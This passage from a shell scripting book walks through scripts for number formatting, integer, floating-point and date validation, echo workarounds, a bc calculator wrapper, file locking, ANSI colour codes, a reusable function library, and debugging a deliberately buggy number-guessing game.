   echo "Usage: $(basename $0) [-d c] [-t c] numeric value"
   echo "       -d specifies the decimal point delimiter (default '.')"
   echo "       -t specifies the thousands delimiter (default ',')"
   exit 0
fi

nicenumber $1 1      # second arg forces nicenumber to 'echo' output

exit 0

How It Works
The heart of this script is the while loop within the nicenumber function, which takes the numeric value and
iteratively splits it into the three least significant digits (the three that'll go to the right of the next comma) and the
remaining numeric value. The remaining value is then fed through the loop again.

Running the Script


To run this script, simply specify a very large numeric value, and the script will add a decimal point and thousands
separators as needed, using either the default values or the characters specified as flags.
Because the function outputs a numeric result, the result can be incorporated within an output message, as
demonstrated here:
echo "Do you really want to pay $(nicenumber $price) dollars?"

The Results
$ nicenumber 5894625
5,894,625
$ nicenumber 589462532.433
589,462,532.433
$ nicenumber -d, -t. 589462532.433
589.462.532,433

Hacking the Script


Different countries use different characters for the thousands and decimal delimiters, hence the addition of flexible
calling flags to this script. For example, Germans and Italians would use -d"," and -t".". The French use -d","
and -t" ", and the Swiss, who have four national languages, use -d"." and -t"'". This is a great example of a
situation in which flexible is better than hard-coded, so that the tool is useful to the largest possible user community.
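As an aside, many modern printf implementations (bash's builtin and GNU coreutils among them) accept the apostrophe flag from the C printf(3) family, which groups digits according to the current locale. Support and locale availability vary from system to system, so treat this as a possible shortcut rather than a portable replacement for nicenumber:

```shell
# With a US locale available, this groups digits with commas: 5,894,625.
# With the C locale (or no locale data installed), it degrades to 5894625.
LC_NUMERIC=en_US.UTF-8 printf "%'d\n" 5894625
```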
On the other hand, I did hard-code the "." as the decimal separator for input values, so if you are anticipating
fractional input values using a different delimiter, you can change the two calls to cut that specify a "." as the
decimal delimiter. Here's one solution:
integer=$(echo $1 | cut "-d$DD" -f1)      # left of the decimal
decimal=$(echo $1 | cut "-d$DD" -f2)      # right of the decimal
This works, but it isn't particularly elegant if a different decimal separator character is used. A more sophisticated
solution would include a test just before these two lines to ensure that the expected decimal separator was the one
requested by the user. We could add this test by using the same basic concept shown in Script #2: Cut out all the
digits and see what's left:
separator="$(echo $1 | sed 's/[[:digit:]]//g')"
if [ ! -z "$separator" -a "$separator" != "$DD" ] ; then
   echo "$0: Unknown decimal separator $separator encountered." >&2
   exit 1
fi

#5 Validating Integer Input


As you saw in Script #2, validating integer input seems like a breeze until you want to ensure that negative values are
acceptable too. The problem is that each numeric value can have only one negative sign, which must come at the very
beginning of the value. The validation routine in this script makes sure that negative numbers are correctly formatted,
and, to make it more generally useful, it can also check that values are within a range specified by the user.

The Code
#!/bin/sh

# validint -- Validates integer input, allowing negative ints too.

validint()
{
   # Validate first field. Then test against min value $2 and/or
   #   max value $3 if they are supplied. If they are not supplied, skip these tests.

   number="$1";    min="$2";    max="$3"

   if [ -z "$number" ] ; then
      echo "You didn't enter anything. Unacceptable." >&2 ; return 1
   fi

   if [ "${number%${number#?}}" = "-" ] ; then   # is first char a '-' sign?
      testvalue="${number#?}"                    # all but first character
   else
      testvalue="$number"
   fi

   nodigits="$(echo $testvalue | sed 's/[[:digit:]]//g')"

   if [ ! -z "$nodigits" ] ; then
      echo "Invalid number format! Only digits, no commas, spaces, etc." >&2
      return 1
   fi

   if [ ! -z "$min" ] ; then
      if [ "$number" -lt "$min" ] ; then
         echo "Your value is too small: smallest acceptable value is $min" >&2
         return 1
      fi
   fi

   if [ ! -z "$max" ] ; then
      if [ "$number" -gt "$max" ] ; then
         echo "Your value is too big: largest acceptable value is $max" >&2
         return 1
      fi
   fi

   return 0
}

Running the Script


This entire script is a function that can be copied into other shell scripts or included as a library file. To turn this into a
command, simply append the following to the bottom of the script:
if validint "$1" "$2" "$3" ; then
   echo "That input is a valid integer value within your constraints"
fi

The Results
$ validint 1234.3
Invalid number format! Only digits, no commas, spaces, etc.
$ validint 103 1 100
Your value is too big: largest acceptable value is 100
$ validint -17 0 25
Your value is too small: smallest acceptable value is 0
$ validint -17 -20 25
That input is a valid integer value within your constraints

Hacking the Script


Notice in this script the following test to see if the number's first character is a negative sign:
if [ "${number%${number#?}}" = "-" ] ; then
If the first character is a negative sign, testvalue is assigned the numeric portion of the integer value. This
nonnegative value is then stripped of digits, and what remains is tested further.
You might be tempted to use a logical AND to connect expressions and shrink some of the nested if statements. For
example, it seems as though the following should work:
if [ ! -z $min -a "$number" -lt "$min" ] ; then
   echo "Your value is too small: smallest acceptable value is $min" >&2
   exit 1
fi
However, it doesn't work because you can't guarantee in a shell script AND expression that the second condition won't
be tested if the first proves false. It shouldn't be tested, but . . .
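If you do want to flatten the nesting, there is a safe alternative: chain two separate test commands with the shell's && operator. Unlike -a, which hands both expressions to a single test invocation, && is a genuine short-circuit at the shell level, so the numeric comparison is never attempted when $min is empty:

```shell
min=10
number=5

# The second [ ] command runs only if the first succeeds: true short-circuiting
if [ -n "$min" ] && [ "$number" -lt "$min" ] ; then
   echo "Your value is too small: smallest acceptable value is $min" >&2
fi

min=""      # no minimum supplied: the comparison is safely skipped
if [ -n "$min" ] && [ "$number" -lt "$min" ] ; then
   echo "never reached"
fi
```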

#6 Validating Floating-Point Input


Upon first glance, the process of validating a floating-point (or "real") value within the confines and capabilities of a
shell script might seem daunting, but consider that a floating-point number is only two integers separated by a decimal
point. Couple that insight with the ability to reference a different script inline (v a li d in t), and you can see that the
floating-point validation test is surprisingly short.

The Code
#!/bin/sh

# validfloat -- Tests whether a number is a valid floating-point value.
#   Note that this script cannot accept scientific (1.304e5) notation.
#
# To test whether an entered value is a valid floating-point number, we
#   need to split the value at the decimal point. We then test the first part
#   to see if it's a valid integer, then test the second part to see if it's a
#   valid >= 0 integer, so -30.5 is valid, but -30.-8 isn't.

. validint      # Bourne shell notation to source the validint function

validfloat()
{
   fvalue="$1"

   if [ ! -z "$(echo $fvalue | sed 's/[^.]//g')" ] ; then

      decimalPart="$(echo $fvalue | cut -d. -f1)"
      fractionalPart="$(echo $fvalue | cut -d. -f2)"

      if [ ! -z "$decimalPart" ] ; then
         if ! validint "$decimalPart" "" "" ; then
            return 1
         fi
      fi

      if [ "${fractionalPart%${fractionalPart#?}}" = "-" ] ; then
         echo "Invalid floating-point number: '-' not allowed \
after decimal point" >&2
         return 1
      fi

      if [ "$fractionalPart" != "" ] ; then
         if ! validint "$fractionalPart" "0" "" ; then
            return 1
         fi
      fi

      if [ "$decimalPart" = "-" -o -z "$decimalPart" ] ; then
         if [ -z "$fractionalPart" ] ; then
            echo "Invalid floating-point format." >&2 ; return 1
         fi
      fi

   else
      if [ "$fvalue" = "-" ] ; then
         echo "Invalid floating-point format." >&2 ; return 1
      fi

      if ! validint "$fvalue" "" "" ; then
         return 1
      fi
   fi

   return 0
}

Running the Script


If no error message is produced when the function is called, the return code is 0, and the number specified is a valid
floating-point value. You can test this script by appending the following few lines to the end of the code just given:
if validfloat $1 ; then
   echo "$1 is a valid floating-point value"
fi

exit 0

The Results
$ validfloat 1234.56
1234.56 is a valid floating-point value
$ validfloat -1234.56
-1234.56 is a valid floating-point value
$ validfloat -.75
-.75 is a valid floating-point value
$ validfloat -11.-12
Invalid floating-point number: '-' not allowed after decimal point
$ validfloat 1.0344e22
Invalid number format! Only digits, no commas, spaces, etc.
Debugging the debugging

If you see additional output at this point, it might be because you added
a few lines to test out validint earlier, but forgot to remove them
when you moved on to this script. Simply go back to validint and
ensure that the last few lines that run the function are commented out
or deleted.

Hacking the Script


A cool additional hack would be to extend this function to allow scientific notation, as demonstrated in the last example.
It wouldn't be too difficult. You'd test for the presence of 'e' or 'E' and then split the result into three segments: the
decimal portion (always a single digit), the fractional portion, and the power of ten. Then you just need to ensure that
each segment passes the validint test.
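A sketch of the splitting step (my own illustration of the approach, not part of the book's script): pick the value apart at the e or E, then hand each piece to the existing validation functions.

```shell
value="1.304e5"    # hypothetical sample input

case $value in
   *[eE]* )
      mantissa="$(echo $value | sed 's/[eE].*//')"   # everything before e/E: 1.304
      exponent="$(echo $value | sed 's/.*[eE]//')"   # everything after e/E: 5
      ;;
   * )
      mantissa="$value" ; exponent=""
      ;;
esac

echo "mantissa=$mantissa exponent=$exponent"
# mantissa would then go to validfloat, exponent to validint
```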

#7 Validating Date Formats


One of the most challenging validation tasks, but one that's crucial for shell scripts that work with dates, is to ensure
that a specific date is actually possible. If we ignore leap years, this task is not too bad, because the calendar is well
behaved and consistent each year. All we need in that case is a table with the days of each month against which to
compare a specified date. To take leap years into account, you have to add some additional logic to the script. One set
of rules for calculating a leap year is as follows:
Years not divisible by 4 are not leap years.
Years divisible by 4 and by 400 are leap years.
Years divisible by 4, not divisible by 400, and divisible by 100, are not leap years.
All other years divisible by 4 are leap years.
Notice how this script utilizes normdate (Script #3) to ensure a consistent date format before proceeding.

The Code
#!/bin/sh

# valid-date -- Validates a date, taking into account leap year rules.

exceedsDaysInMonth()
{
   # Given a month name, return 0 if the specified day value is
   #   less than or equal to the max days in the month; 1 otherwise

   case $(echo $1|tr '[:upper:]' '[:lower:]') in
      jan* ) days=31   ;;
      feb* ) days=28   ;;
      mar* ) days=31   ;;
      apr* ) days=30   ;;
      may* ) days=31   ;;
      jun* ) days=30   ;;
      jul* ) days=31   ;;
      aug* ) days=31   ;;
      sep* ) days=30   ;;
      oct* ) days=31   ;;
      nov* ) days=30   ;;
      dec* ) days=31   ;;
      * ) echo "$0: Unknown month name $1" >&2; exit 1
   esac

   if [ $2 -lt 1 -o $2 -gt $days ] ; then
      return 1
   else
      return 0      # the day number is valid
   fi
}

isLeapYear()
{
   # This function returns 0 if a leap year; 1 otherwise.
   # The formula for checking whether a year is a leap year is:
   #   1. Years not divisible by 4 are not leap years.
   #   2. Years divisible by 4 and by 400 are leap years.
   #   3. Years divisible by 4, not divisible by 400, and divisible by 100,
   #      are not leap years.
   #   4. All other years divisible by 4 are leap years.

   year=$1
   if [ "$((year % 4))" -ne 0 ] ; then
      return 1    # nope, not a leap year
   elif [ "$((year % 400))" -eq 0 ] ; then
      return 0    # yes, it's a leap year
   elif [ "$((year % 100))" -eq 0 ] ; then
      return 1
   else
      return 0
   fi
}

## Begin main script

if [ $# -ne 3 ] ; then
   echo "Usage: $0 month day year" >&2
   echo "Typical input formats are August 3 1962 and 8 3 2002" >&2
   exit 1
fi

# Normalize date and split back out returned values

newdate="$(normdate "$@")"

if [ $? -eq 1 ] ; then
   exit 1      # error condition already reported by normdate
fi

month="$(echo $newdate | cut -d' ' -f1)"
day="$(echo $newdate | cut -d' ' -f2)"
year="$(echo $newdate | cut -d' ' -f3)"

# Now that we have a normalized date, let's check to see if the
#   day value is logical

if ! exceedsDaysInMonth $month "$2" ; then
   if [ "$month" = "Feb" -a "$2" -eq "29" ] ; then
      if ! isLeapYear $3 ; then
         echo "$0: $3 is not a leap year, so Feb doesn't have 29 days" >&2
         exit 1
      fi
   else
      echo "$0: bad day value: $month doesn't have $2 days" >&2
      exit 1
   fi
fi

echo "Valid date: $newdate"

exit 0

Running the Script


To run the script, simply specify a date on the command line, in "month day year" format. The month can be a three-letter abbreviation, a full word, or a numeric value; the year must be four digits.

The Results
$ valid-date august 3 1960
Valid date: Aug 3 1960
$ valid-date 9 31 2001
valid-date: bad day value: Sep doesn't have 31 days
$ valid-date feb 29 2004
Valid date: Feb 29 2004
$ valid-date feb 29 2006
valid-date: 2006 is not a leap year, so Feb doesn't have 29 days

Hacking the Script


A roughly similar approach to this script could validate time specifications, either using a 24-hour clock or with an ante
meridiem/post meridiem (am/pm) suffix. Split the value at the colon, ensure that the minutes and seconds (if specified)
are between 0 and 59, and then check that the first value is between 1 and 12 if allowing am/pm, or between 0 and 23
if you prefer a 24-hour clock. (Fortunately, while there are leap seconds and other tiny variations in time to help keep
the calendar balanced, we can safely ignore them on a day-to-day basis.)
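Here's a rough sketch of that idea for HH:MM values on a 24-hour clock (a hypothetical helper, not from the book; seconds and am/pm handling are left as an exercise, and empty fields aren't handled):

```shell
validtime24()
{
   hour="$(echo $1 | cut -d: -f1)"
   minute="$(echo $1 | cut -d: -f2)"

   case "$hour$minute" in
      *[!0-9]* ) return 1 ;;    # any non-digit character? reject
   esac

   if [ "$hour" -gt 23 -o "$minute" -gt 59 ] ; then
      return 1
   fi
   return 0
}

validtime24 "23:45" && echo "23:45 ok"          # → 23:45 ok
validtime24 "9:61"  || echo "9:61 rejected"     # → 9:61 rejected
```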

#8 Sidestepping Poor Echo Implementations


While most modern Unix and Linux implementations have a version of the echo command that knows that the -n flag
should cause the program to suppress the trailing newline, not all implementations work that way. Some use \c as a
special embedded character to defeat the default behavior, and others simply insist on including the trailing newline
regardless.
Figuring out whether your particular echo is well implemented is easy: Simply type in the following on the command
line and see what happens:
$ echo -n "The rain in Spain"; echo " falls mainly on the Plain"
If your echo works with the -n flag, you'll see:
The rain in Spain falls mainly on the Plain
If it doesn't, you'll see this:
-n The rain in Spain
falls mainly on the Plain
Ensuring that the script output is presented to the user as desired is quite important and will certainly become
increasingly important as our scripts become more interactive.

The Code
There are as many ways to solve this quirky echo problem as there are pages in this book. One of my favorites is
very succinct:
function echon
{
   echo "$*" | awk '{ printf "%s", $0 }'
}
You may prefer to avoid the overhead incurred when calling the awk command, however, and if you have a user-level
command called printf you can use it instead:
echon()
{
   printf "%s" "$*"
}
But what if you don't have printf and you don't want to call awk? Then use the tr command:
echon()
{
   echo "$*" | tr -d '\n'
}
This method of simply chopping out the trailing newline with tr is a simple and efficient solution that should be quite
portable.

Running the Script


When using this script, you can simply replace calls to echo with echon, which will leave the cursor at the end of the
line, rather than automatically appending a newline:
echon "Enter coordinates for satellite acquisition: "

#9 An Arbitrary-Precision Floating-Point Calculator


One of the most commonly used sequences in script writing is $(( )), which lets you perform calculations using
various rudimentary mathematical functions. This sequence can be quite useful, most commonly when incrementing
counter variables, and it supports addition, subtraction, division, remainder, and multiplication, though not any sort of
fractional or decimal value. Thus, the following command returns 0, not 0.5:
echo $((1 / 2))
So when calculating values that need better precision, you've got a challenge on your hands. There just aren't many
good calculator programs that work on the command line. Except, that is, for bc, an oddball program that few Unix
people are taught. Billing itself as an arbitrary-precision calculator, the bc program harkens back to the very dawn of
Unix, with its cryptic error messages, complete lack of prompts, and assumption that if you're using it, you already know
what you're doing. But that's okay. We can cope.

The Code
#!/bin/sh

# scriptbc -- Wrapper for 'bc' that returns the result of a calculation.

if [ "$1" = "-p" ] ; then
   precision=$2
   shift 2
else
   precision=2      # default
fi

bc -q << EOF
scale=$precision
$*
quit
EOF

exit 0

How It Works
This script demonstrates the useful here document capability in shell scripting. The << notation allows you to include
material in the script that is treated as if it were taken directly from the input stream, which in this case allows an easy
mechanism for handing commands to the bc program.
This is also our first script that demonstrates how command arguments can be utilized within a script to enhance the
flexibility of a command. Here, if the script is invoked with a -p flag, it allows you to specify the desired scale. If no
scale is specified, the program defaults to scale=2.
When working with bc, it's critical to understand the difference between length and scale. As far as bc is
concerned, length refers to the total number of decimal digits in the number, while scale is the total number of
digits after the decimal point. Thus, 10.25 has a length of four and a scale of two, while 3.14159 has a length
of six and a scale of five.
By default, bc has a variable value for length, but because it has a scale of zero, bc without any modifications
works exactly as the $(( )) notation does. Fortunately, if you add a scale setting to bc, you find that there's lots of
hidden power under the hood, as shown here:
$ bc
bc 1.05
Copyright 1991, 1992, 1993, 1994, 1997, 1998 Free Software Foundation, Inc.
This is free software with ABSOLUTELY NO WARRANTY.
For details type `warranty'.
scale=10
(2002-1962)*365
14600
14600/7
2085.7142857142
quit
To allow access to the bc capabilities from the command line, a wrapper script has to silence the opening copyright
information, if present, even though most bc implementations know that they should silence the header if their input
isn't the terminal (stdin). The wrapper also sets the scale to a reasonable value, feeds in the actual expression to
the bc program, and then exits with a quit command.

Running the Script


To run this script, feed a mathematical expression to the program as an argument.

The Results
$ scriptbc 14600/7
2085.71
$ scriptbc -p 10 14600/7
2085.7142857142

#10 Locking Files


Any script that reads or appends to a shared data file, such as a log file, needs a reliable way to lock the file so that
other instantiations of the script don't step on the updates. The idea is that the existence of a separate lock file serves
as a semaphore, an indicator that a different file is busy and cannot be used. The requesting script waits and tries
again, hoping that the file will be freed up relatively promptly, denoted by having its lock file removed.
Lock files are tricky to work with, though, because many seemingly foolproof solutions fail to work properly. For
example, the following is a typical approach to solving this problem:
while [ -f $lockfile ] ; do
   sleep 1
done
touch $lockfile
Seems like it would work, doesn't it? You loop until the lock file doesn't exist, then create it to ensure that you own the
lock file and can therefore modify the base file safely. If another script with the same loop sees your lock, it will spin
until the lock file vanishes. However, this doesn't in fact work, because while it seems that scripts are run without being
swapped out while other processes take their turn, that's not actually true. Imagine what would happen if, just after the
done in the loop just shown, but before the touch, this script was swapped out and put back in the processor queue
while another script was run instead. That other script would dutifully test for the lock file, find it missing, and create its
own version. Then the script in the queue would swap back in and do a touch, with the result that two scripts would
both think they had exclusive access, which is bad.
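If lockfile isn't available, one widely used workaround (my sketch, not the book's script) leans on the fact that mkdir is atomic: the test for the lock and its creation happen in a single system call, so the race just described can't occur.

```shell
#!/bin/sh

# Use a lock *directory* rather than a lock file: mkdir either creates it
# (and we now hold the lock) or fails because another process got there first
lockdir="${TMPDIR:-/tmp}/demo.$$.lock"   # hypothetical lock name

if mkdir "$lockdir" 2>/dev/null ; then
   echo "acquired lock"
   # ... safely modify the shared file here ...
   rmdir "$lockdir"                      # release the lock
else
   echo "lock busy; try again later"
fi
```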
Fortunately, Stephen van den Berg and Philip Guenther, authors of the popular procmail email filtering program,
include a lockfile command that lets you safely and reliably work with lock files in shell scripts.
Many Unix distributions, including Linux and Mac OS X, have lockfile already installed. You can check whether
your system has lockfile simply by typing man 1 lockfile. If you get a man page, you're in luck! If not,
download the procmail package from http://www.procmail.org/ and install the lockfile command on
your system. The script in this section assumes that you have the lockfile command, and subsequent scripts
(particularly in Chapter 7, "Web and Internet Users") require the reliable locking mechanism of Script #10.

The Code
#!/bin/sh

# filelock -- A flexible file locking mechanism.

retries="10"            # default number of retries
action="lock"           # default action
nullcmd="/bin/true"     # null command for lockfile

while getopts "lur:" opt; do
   case $opt in
      l ) action="lock"      ;;
      u ) action="unlock"    ;;
      r ) retries="$OPTARG"  ;;
   esac
done
shift $(($OPTIND - 1))

if [ $# -eq 0 ] ; then
   cat << EOF >&2
Usage: $0 [-l|-u] [-r retries] lockfilename
Where -l requests a lock (the default), -u requests an unlock, -r X
specifies a maximum number of retries before it fails (default = $retries).
EOF
   exit 1
fi

# Ascertain whether we have lockf or lockfile system apps

if [ -z "$(which lockfile | grep -v '^no ')" ] ; then
   echo "$0 failed: 'lockfile' utility not found in PATH." >&2
   exit 1
fi

if [ "$action" = "lock" ] ; then
   if ! lockfile -1 -r $retries "$1" 2> /dev/null ; then
      echo "$0: Failed: Couldn't create lockfile in time" >&2
      exit 1
   fi
else    # action = unlock
   if [ ! -f "$1" ] ; then
      echo "$0: Warning: lockfile $1 doesn't exist to unlock" >&2
      exit 1
   fi
   rm -f "$1"
fi

exit 0

Running the Script


While the filelock script isn't one that you'd ordinarily use by itself, you can try to test it by having two terminal
windows open. To create a lock, simply specify the name of the file you want to try to lock as an argument of
filelock. To remove the lock, add the -u flag.

The Results
First, create a locked file:
$ filelock /tmp/exclusive.lck
$ ls -l /tmp/exclusive.lck
-r--r--r--  1 taylor  wheel  1 Mar 21 15:35 /tmp/exclusive.lck
The second time you attempt to lock the file, filelock tries the default number of times (ten) and then fails, as
follows:
$ filelock /tmp/exclusive.lck
filelock : Failed: Couldn't create lockfile in time
When the first process is done with the file, you can release the lock:
$ filelock -u /tmp/exclusive.lck
To see how the filelock script works with two terminals, run the unlock command in one window while the other
window spins trying to establish its own exclusive lock.

Hacking the Script


Because this script relies on the existence of a lock file as proof that the lock is still enforced, it would be useful to have
an additional parameter that is, say, the longest length of time for which a lock should be valid. If the lockfile
routine times out, the last accessed time of the locked file could then be checked, and if the locked file is older than the
value of this parameter, it can safely be deleted as a stray, perhaps with a warning message, perhaps not.
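One way to sketch that stale-lock check is with find's file-age test. Note that the -mmin (minutes) test is a GNU/BSD extension; strictly POSIX finds only offer day-granularity -mtime. The path and the ten-minute cutoff below are invented for the example:

```shell
#!/bin/sh
# If the lock file is older than $maxminutes, treat it as a stray left
# behind by a crashed process and remove it with a warning.
lockfilename="/tmp/demo.$$.lck"
maxminutes=10

touch "$lockfilename"     # simulate a lock created just now

if [ -f "$lockfilename" ] ; then
  # find prints the filename only if it is older than the cutoff
  stray="$(find "$lockfilename" -mmin +$maxminutes 2>/dev/null)"
  if [ -n "$stray" ] ; then
    echo "Warning: removing stale lock $lockfilename" >&2
    rm -f "$lockfilename"
  else
    echo "lock is still fresh; leaving it alone"
  fi
fi
```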
This is unlikely to affect you, but lockfile doesn't work with NFS-mounted disks. In fact, a reliable file locking
mechanism on an NFS-mounted disk is quite complex. A better strategy that sidesteps the problem entirely is to create
lock files only on local disks.

#11 ANSI Color Sequences


Although you probably don't realize it, your standard terminal application supports different styles of presenting text.
Quite a few variations are possible, whether you'd like to have certain words in your script displayed in bold, or even in
red against a yellow background. However, working with ANSI (American National Standards Institute) sequences to
represent these variations can be difficult because these sequences are quite user unfriendly. Therefore, this script
fragment creates a set of variables, whose values represent the ANSI codes, that can turn on and off the various color
and formatting display capabilities.

The Code
#!/bin/sh

# ANSI Color -- Use these variables to make output in different colors
# and formats. Color names that end with 'f' are foreground (text) colors,
# and those ending with 'b' are background colors.

initializeANSI()
{
  esc="\033"    # if this doesn't work, enter an ESC directly

  blackf="${esc}[30m";   redf="${esc}[31m";    greenf="${esc}[32m"
  yellowf="${esc}[33m"   bluef="${esc}[34m";   purplef="${esc}[35m"
  cyanf="${esc}[36m";    whitef="${esc}[37m"

  blackb="${esc}[40m";   redb="${esc}[41m";    greenb="${esc}[42m"
  yellowb="${esc}[43m"   blueb="${esc}[44m";   purpleb="${esc}[45m"
  cyanb="${esc}[46m";    whiteb="${esc}[47m"

  boldon="${esc}[1m";    boldoff="${esc}[22m"
  italicson="${esc}[3m"; italicsoff="${esc}[23m"
  ulon="${esc}[4m";      uloff="${esc}[24m"
  invon="${esc}[7m";     invoff="${esc}[27m"

  reset="${esc}[0m"
}

How It Works
If you're used to HTML, you might be a bit baffled by the way these sequences work. In HTML, you open and close
modifiers in opposite order, and you must close every modifier you open. So to create an italicized passage within a
sentence displayed in bold, you'd use the following HTML:
<b>this is in bold and <i>this is italics</i> within the bold</b>
Closing the bold tag without closing the italics wreaks havoc and can crash some Web browsers. But with the ANSI
color sequences, some modifiers replace the previous modifier, and all modifiers are closed with a single reset
sequence. With ANSI sequences, you must make sure to output the reset sequence after colors and to use the "off"
feature for anything you turn on. Using the variable definitions in this script, you would write the previous sequence as
follows:
${boldon}this is in bold and ${italicson}this is
italics${italicsoff} within the bold ${reset}

Running the Script


To run this script, we'll need to initialize all the ANSI sequences and then output a few echo statements with different
combinations of color and type effect:
initializeANSI

cat << EOF
${yellowf}This is a phrase in yellow${redb} and red${reset}
${boldon}This is bold${ulon} this is italics${reset} bye bye
${italicson}This is italics${italicsoff} and this is not
${ulon}This is ul${uloff} and this is not
${invon}This is inv${invoff} and this is not
${yellowf}${redb}Warning I${yellowb}${redf}Warning II${reset}
EOF

The Results
The appearance of the results isn't too thrilling in this book, but on a display that supports these color sequences it
definitely catches your attention:
This is a phrase in yellow and red
This is bold this is italics bye bye
This is italics and this is not
This is ul and this is not
This is inv and this is not
Warning I Warning II

Hacking the Script


When using this script, you may see something like the following:
\033[33m\033[41mWarning!\033[43m\033[31mWarning!\033[0m
If you do, the problem might be that your terminal or window doesn't support ANSI color sequences, but it also might
simply be that the \033 notation for the all-important esc variable isn't understood. To remedy the latter problem,
open up the script in the vi editor or your favorite editor, replace the \033 sequence with a ^V sequence, and then
press the ESC key. You should see ^[ displayed, so the results on screen look like esc="^[" and all should work
fine.
If, on the other hand, your terminal or window doesn't support ANSI color sequences, you might want to upgrade so
that you can add colorized and type-face-enhanced output to your other scripts.

#12 Building a Shell Script Library


Many of the scripts in this chapter have been written as functions rather than as stand-alone scripts so that they can
be easily and gracefully incorporated into other scripts without incurring the overhead of making system calls. While
there's no #include feature in a shell script, as there is in C, there is a tremendously important capability called
sourcing a file that serves the same purpose.
To see why this is important, let's consider the alternative. If you invoke a shell script within a shell, by default that
script is run within its own subshell. You can immediately prove this experimentally:
$ cat tinyscript.sh
test=2
$ test=1
$ tinyscript.sh
$ echo $test
1
Because this script changed the value of the variable test within the subshell running the script, the value of the
existing test variable in the current shell's environment was not affected. If you instead use the "." source notation to
run the script, it is handled as though each command in the script was typed directly into the current shell:
$ . tinyscript.sh
$ echo $test
2
As you might expect, if you have an exit 0 command within a script that's sourced, for example, it will exit that shell
and log out of that window.
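Because a sourced exit kills the calling shell, library functions are usually written to hand back a status with return and let the caller decide whether to bail out. A small sketch of the distinction, with an invented function name:

```shell
#!/bin/sh
# In a sourced library, prefer 'return' inside functions over 'exit':
# 'exit' would terminate the shell that sourced the file, while
# 'return' just passes a status code back to the caller.
checkPositive()
{
  if [ "$1" -gt 0 ] 2>/dev/null ; then
    return 0      # success status; the caller keeps running
  fi
  return 1        # failure status, but the shell survives
}

if checkPositive 5 ; then
  echo "5 is positive"
fi
if ! checkPositive -3 ; then
  echo "-3 is not positive, and this shell is still alive"
fi
```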

The Code
To turn the functions in this chapter into a library for use in other scripts, extract all the functions and concatenate them
into one big file. If we call this file library.sh, a test script that accesses all of the functions might look like this:
#!/bin/sh

# Library test script

. library.sh

initializeANSI

echon "First off, do you have echo in your path? (1=yes, 2=no) "
read answer
while ! validint $answer 1 2 ; do
  echon "${boldon}Try again${boldoff}. Do you have echo "
  echon "in your path? (1=yes, 2=no) "
  read answer
done
if ! checkForCmdInPath "echo" ; then
  echo "Nope, can't find the echo command."
else
  echo "The echo command is in the PATH."
fi

echo ""
echon "Enter a year you think might be a leap year: "
read year
while ! validint $year 1 9999 ; do
  echon "Please enter a year in the ${boldon}correct${boldoff} format: "
  read year
done
if isLeapYear $year ; then
  echo "${greenf}You're right! $year was a leap year.${reset}"
else
  echo "${redf}Nope, that's not a leap year.${reset}"
fi

exit 0
Notice that the library is incorporated, and all functions are read and included in the run-time environment of the script,
with the single line
. library.sh
This is a useful approach in working with the many scripts in this book, and one that can be exploited again and again
as needed.

Running the Script


To run the test script given in the previous section, simply invoke it at the command line.

The Results
$ library-test
First off, do you have echo in your path? (1=yes, 2=no) 1
The echo command is in the PATH.

Enter a year you think might be a leap year: 432423
Your value is too big: largest acceptable value is 9999
Please enter a year in the correct format: 432
You're right! 432 was a leap year.
On your computer screen, the error messages just shown will be a bit more blunt because their words will be in bold,
and the correct guess of a leap year will be displayed in green.

#13 Debugging Shell Scripts


Although this section does not contain a true script per se, it's a good place to spend a few pages talking about some
of the basics of debugging and developing shell scripts, because it's a sure bet that bugs are going to creep in!
The best debugging strategy I have found is to build scripts incrementally. Some script programmers have a high
degree of optimism that everything will work right the first time, but I find that starting small, on a modest scale, can
really help move things along. Additionally, liberal use of echo statements to track variables, and using the -x flag to
the shell for displaying debugging output, are quite useful. To see these in action, let's debug a simple number-guessing game.
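The -x flag doesn't require editing anything: run any script as sh -x scriptname and each command is echoed (with a leading +) to stderr before it executes. You can also narrow the trace to just a suspect region from inside the script; a quick sketch with invented variables:

```shell
#!/bin/sh
# Toggle execution tracing around a suspect region of a script.
# Trace lines go to stderr with a leading '+' per command executed.
set -x                    # start tracing
guess=42
answer=$(($guess * 2))
set +x                    # stop tracing once past the suspect region
echo "answer is $answer"
```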

The Code
#!/bin/sh

# hilow -- A simple number-guessing game

biggest=100                   # maximum number possible
guess=0                       # guessed by player
guesses=0                     # number of guesses made
number=$(($$ % $biggest)      # random number, between 1 and $biggest

while [ $guess -ne $number ] ; do
  echo -n "Guess? " ; read answer
  if [ "$guess" -lt $number ] ; then
    echo "... bigger!"
  elif [ "$guess" -gt $number ] ; then
    echo "... smaller!
  fi
  guesses=$(($guesses + 1))
done

echo "Right!! Guessed $number in $guesses guesses."

exit 0

Running the Script


The first step in debugging this game is to test and ensure that the number generated will be sufficiently random. To do
this, we take the process ID of the shell in which the script is run, using the $$ notation, and reduce it to a usable
range using the % mod function. To test the function, enter the commands into the shell directly:
$ echo $(($$ % 100))
5
$ echo $(($$ % 100))
5
$ echo $(($$ % 100))
5
It worked, but it's not very random. A moment's thought reveals why that is: When the command is run directly on the
command line, the PID is always the same. When run in a script, the command is in a different subshell each time, so
the PID varies.
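You can watch that difference directly: each sh -c below starts a brand-new shell with its own PID, so the expression is effectively reseeded per invocation, while repeating it at one interactive prompt reuses a single PID. A quick sketch:

```shell
#!/bin/sh
# $$ inside 'sh -c' is the PID of a freshly spawned shell, so two
# invocations normally yield different values; typed repeatedly at one
# interactive prompt, $$ (and hence the modulo result) never changes.
first=$(sh -c 'echo $(($$ % 100))')
second=$(sh -c 'echo $(($$ % 100))')
echo "first run: $first, second run: $second"
```

(The two values can occasionally coincide, since nothing guarantees the two PIDs differ modulo 100; this is why $$ is only a rough-and-ready random source.)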
The next step is to add the basic logic of the game. A random number between 1 and 100 is generated, the player
makes guesses at the number, and after each guess the player is told whether the guess is too high or too low until he
or she figures out what number it is. After entering all the basic code, it's time to run the script and see how it goes,
using exactly the code just shown, warts and all:
$ hilow
./013-hilow.sh: line 19: unexpected EOF while looking for matching `"'
./013-hilow.sh: line 22: syntax error: unexpected end of file
Ugh; the bane of shell script developers: an unexpected EOF. To understand what this message means, recall that
quoted passages can contain newlines, so just because the error is flagged on line 19 doesn't mean that it's actually
there. It simply means that the shell read merrily along, matching quotes (incorrectly) until it hit the very last quote, at
which point it realized something was amiss. In fact, line 19 is perfectly fine:

$ sed -n 19p hilow
echo "Right!! Guessed $number in $guesses guesses."
The problem, therefore, must be earlier in the script. The only really good thing about the error message from the shell
is that it tells you which character is mismatched, so I'll use grep to try to extract all lines that have a quote and then
screen out those that have two quotes:
$ grep '"' 013-hilow.sh | egrep -v '.*".*".*'
echo "... smaller!
